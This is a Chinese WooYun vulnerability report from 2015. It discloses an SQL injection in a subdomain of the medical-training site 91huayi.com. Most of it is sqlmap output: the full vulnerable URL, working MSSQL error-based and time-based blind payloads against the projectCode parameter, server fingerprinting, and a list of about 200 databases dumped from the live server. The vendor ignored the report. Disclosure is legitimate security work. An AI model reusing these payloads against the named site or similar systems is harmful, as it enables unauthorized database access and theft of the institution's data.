当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158504

漏洞标题:华医网某处SQL注入漏洞(200库)

相关厂商:91huayi.com

漏洞作者: 路人甲

提交时间:2015-12-07 13:21

修复时间:2015-12-12 13:22

公开时间:2015-12-12 13:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://cme.gxwskjw.91huayi.com/report/publicedList.aspx?displayMode=1&frontForUnit=1&holdYear=2015&lowUnitCode=200001&principalName=anxtbfog&projectCode=124&projectKind=1&projectName=bcrpvkel&publicBatch=-1&subject2=01&subject3=0101

1.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: projectCode (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: displayMode=1&frontForUnit=1&holdYear=2015&lowUnitCode=200001&principalName=anxtbfog&projectCode=124' AND 7524=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7524=7524) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'LeaQ'='LeaQ&projectKind=1&projectName=bcrpvkel&publicBatch=-1&subject2=01&subject3=0101
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: displayMode=1&frontForUnit=1&holdYear=2015&lowUnitCode=200001&principalName=anxtbfog&projectCode=124' AND 2027=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'lrnD'='lrnD&projectKind=1&projectName=bcrpvkel&publicBatch=-1&subject2=01&subject3=0101
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [200]:
[*] 0724zkys
[*] baicheng_wsglw
[*] baishan_wsglw
[*] BJ_JJPT
[*] BjApply
[*] bjhp
[*] bjhp0801
[*] ccme
[*] changchun_wsglw
[*] cme
[*] cme_beihai
[*] cme_binzhou
[*] cme_bj
[*] cme_haikou
[*] cme_hezhou
[*] cme_leshan
[*] cme_local_common
[*] cme_luzhou
[*] cme_meishan
[*] cme_middle_kjpt
[*] cme_sd
[*] cme_shenyang
[*] cme_shenyang2
[*] cme_shiyan
[*] cme_shiyan2
[*] cme_shiyan3
[*] cme_wenzhou
[*] cme_wenzhou2
[*] cme_wenzhou3
[*] cme_xjyfy
[*] cme_yanbianzhou
[*] cme_yanshi
[*] cme_yantai
[*] cme_yibin
[*] cme_yiwu
[*] cme_yunfu
[*] cme_ziyang
[*] cqwsw.net
[*] czwsw
[*] dlzwsw.91huayi
[*] DS_HY_COMMON
[*] exambd
[*] ezine_wenzhou
[*] ezine_yiwu2011
[*] gd_wj
[*] GPSS
[*] GSYXH
[*] gxav
[*] gxwskjw
[*] haoyisheng_guangdong
[*] haoyisheng_shenzhen
[*] hbno
[*] hbno_mt
[*] hljnk
[*] hljwsw
[*] hncme
[*] hpexam
[*] hpexam0801
[*] hpexam_fj
[*] hpexam_sz
[*] hpst
[*] hy_com
[*] hy_com_shenyang
[*] hy_com_shiyan
[*] HY_ZhuanGang
[*] hyzc
[*] hzwj
[*] hzwsw.net
[*] jlshi
[*] kjpt_cme
[*] kjpt_common
[*] kjpt_data_upgrade_hb
[*] kjpt_data_upgrade_海南
[*] kjpt_posdata_swap
[*] kmwsw
[*] liaoyuan_wsglw
[*] master
[*] material
[*] mmmadb
[*] model
[*] msdb
[*] ncwsw
[*] new_cme_back
[*] new_cme_back0813
[*] NnCommDB
[*] pdsCommDB
[*] ppct
[*] praject_apply2
[*] prjapply_dg
[*] prjapply_gdfs
[*] prjapply_gdhy
[*] prjapply_gdjm
[*] prjapply_gdyj
[*] prjapply_gdzq
[*] prjapply_gx
[*] prjapply_hlj
[*] prjapply_jd
[*] prjapply_jl
[*] prjapply_nc
[*] prjapply_sd
[*] prjapply_sdq
[*] prjapply_shiyan
[*] prjapply_sx
[*] prjapply_xian
[*] prjapply_zh
[*] prjapply_zs
[*] project.cqwsw.net
[*] project_apply
[*] project_xj
[*] project_ya
[*] project_yn
[*] ProjectSY
[*] qjwsw
[*] rubbish
[*] sdlc
[*] sfjj
[*] shiyan_wsglw
[*] spwsw
[*] sspa_gx
[*] sspa_gxnn
[*] suining_wsglw
[*] swykCommDB
[*] sywsw
[*] sywsw.cn
[*] taizhou_wsglw
[*] tempdb
[*] tmp
[*] tmpunit海南
[*] toilet_water_apply
[*] tonghua_wsglw
[*] transcript
[*] weinan_wsglw
[*] wh_wsglw
[*] wj_binzhou
[*] wuhan_xmsb
[*] wuhanma.org.cn
[*] xian.wsglw.net
[*] xianyangcme
[*] XJWJ
[*] xnwsw
[*] xuancheng_wsglw
[*] yaan.com
[*] yanbian_wsglw
[*] ylwsw
[*] ynwsw
[*] yulin_wsglw
[*] yunfu
[*] ZJ_ZYYS_Exam
[*] ZJ_ZYYS_Train
[*] zj_zyys_trun
[*] zkys
[*] zkys0801
[*] zkys_bj
[*] zkys_cq
[*] zkys_fj
[*] zkys_fj0227
[*] zkys_fj_temp
[*] zkys_gs
[*] zkys_gx
[*] zkys_gxlz
[*] zkys_nm
[*] zkys_sz
[*] ZYYS_AH_Turn
[*] ZYYS_BJ_Exam
[*] ZYYS_BJ_Train
[*] ZYYS_BJ_Turn
[*] ZYYS_BJ_Turn0128
[*] ZYYS_BJ_TURN1027
[*] zyys_bj_turn_zy
[*] zyys_bj_turn_zy_0813
[*] zyys_cq_dsjyd
[*] zyys_cq_train
[*] zyys_gd_Exam
[*] zyys_gd_train
[*] zyys_gd_Turn
[*] zyys_guangxi_turn
[*] ZYYS_GX_Turn
[*] ZYYS_HN_Exam
[*] ZYYS_HN_Train
[*] ZYYS_HN_Turn
[*] zyys_jd_Exam
[*] zyys_jd_train
[*] zyys_jd_Turn
[*] ZYYS_JL_Exam
[*] ZYYS_JL_Train
[*] ZYYS_JL_Turn
[*] ZYYS_JL_Turn_ZY
[*] ZYYS_NMG_Turn
[*] zyys_qfs_turn
[*] zyys_Shan_turn
[*] zyys_Shan_turn_zy
[*] ZYYS_SX_Turn
[*] ZYYS_SX_Turn_ZY
[*] zyys_zj_exam
[*] ZYYS_ZJ_Exam_ZY
[*] zyys_zj_train
[*] ZYYS_ZJ_Train_ZY
[*] zyys_zj_turn
[*] ZYYS_ZJ_Turn_ZY
[*] zyysht

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-12 13:22

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价